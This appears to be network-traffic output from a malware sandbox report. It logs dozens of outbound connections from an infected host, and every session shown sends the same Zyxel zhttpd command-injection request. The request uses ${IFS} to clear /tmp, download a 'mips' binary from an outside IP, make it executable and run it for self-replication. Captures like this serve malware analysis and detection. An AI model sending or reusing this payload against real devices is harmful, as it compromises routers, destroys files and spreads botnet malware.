                              Mar 31, 2024 08:41:09.575301886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1526192.168.2.135712637.126.194.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575365067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1527192.168.2.134412260.27.224.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575421095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1528192.168.2.135418272.34.123.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575445890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1529192.168.2.135382813.77.229.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575495958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1530192.168.2.1335382125.188.241.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575553894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1531192.168.2.134822642.104.34.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575615883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1532192.168.2.1357276111.118.61.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575655937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1533192.168.2.134159481.37.177.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575716972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1534192.168.2.1352180222.221.46.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575740099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1535192.168.2.1338118106.204.87.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575805902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1536192.168.2.1357616106.249.108.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.577495098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1537192.168.2.133440879.50.52.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.578262091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1538192.168.2.13471882.4.72.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581118107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1539192.168.2.1345338188.209.99.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581146002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1540192.168.2.1337746109.31.209.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581224918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1541192.168.2.1342736189.136.41.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581254959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1542192.168.2.135083477.227.2.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581312895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1543192.168.2.134308636.13.95.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581377029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1544192.168.2.1350686196.209.169.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581438065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1545192.168.2.136013890.220.89.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581487894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1546192.168.2.134689495.88.220.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581564903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1547192.168.2.1350654130.29.231.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581578016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1548192.168.2.133714424.207.108.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581648111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1549192.168.2.135606231.229.125.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581707954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1550192.168.2.135292234.140.170.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581737995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1551192.168.2.135061868.114.194.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581806898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1552192.168.2.1347328191.181.106.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581854105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1553192.168.2.134128249.131.125.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581931114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1554192.168.2.1349612163.83.177.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.581973076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1555192.168.2.1357540203.176.252.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.582005024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1556192.168.2.134800248.215.64.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.582071066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1557192.168.2.1348418136.18.177.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.582133055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1558192.168.2.1352948141.133.124.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.582165956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1559192.168.2.1345832100.199.13.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591079950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1560192.168.2.135651047.27.236.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591100931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1561192.168.2.133712466.61.131.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591136932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1562192.168.2.1336104198.126.152.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591157913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1563192.168.2.1358414131.212.242.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591258049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1564192.168.2.134187664.186.241.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591294050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1565192.168.2.135418486.139.60.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591341972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1566192.168.2.1360416101.91.120.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591373920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1567192.168.2.135170065.182.124.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591401100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1568192.168.2.134474248.181.237.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591451883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1569192.168.2.1340702190.80.155.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591505051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1570192.168.2.1356886183.111.117.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591523886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1571192.168.2.134096071.129.154.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591571093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1572192.168.2.135344835.239.180.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591639996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1573192.168.2.133442874.121.240.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591670990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1574192.168.2.1333352157.108.134.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591706038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1575192.168.2.135364246.14.230.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591739893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1576192.168.2.133359840.182.144.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591779947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1577192.168.2.13541344.177.191.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591819048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1578192.168.2.1351602119.165.186.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591869116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1579192.168.2.1342232143.176.195.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591908932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1580192.168.2.135708642.143.207.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591952085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1581192.168.2.1347190114.15.71.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.591995955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1582192.168.2.135210236.137.11.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592031002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1583192.168.2.1337502130.92.80.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592065096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1584192.168.2.1347734171.143.42.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592106104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1585192.168.2.1347524158.90.178.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592139959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1586192.168.2.135151443.199.44.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592180967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1587192.168.2.1334438201.48.82.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592250109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1588192.168.2.135901824.7.66.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592279911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1589192.168.2.1343594173.62.4.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592330933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1590192.168.2.13571305.131.173.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592391014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1591192.168.2.1353932176.32.253.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592436075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1592192.168.2.1345102101.151.119.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592503071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1593192.168.2.1344296115.63.94.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.592556953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1594192.168.2.134440858.159.217.105443
                              TimestampBytes transferredDirectionData
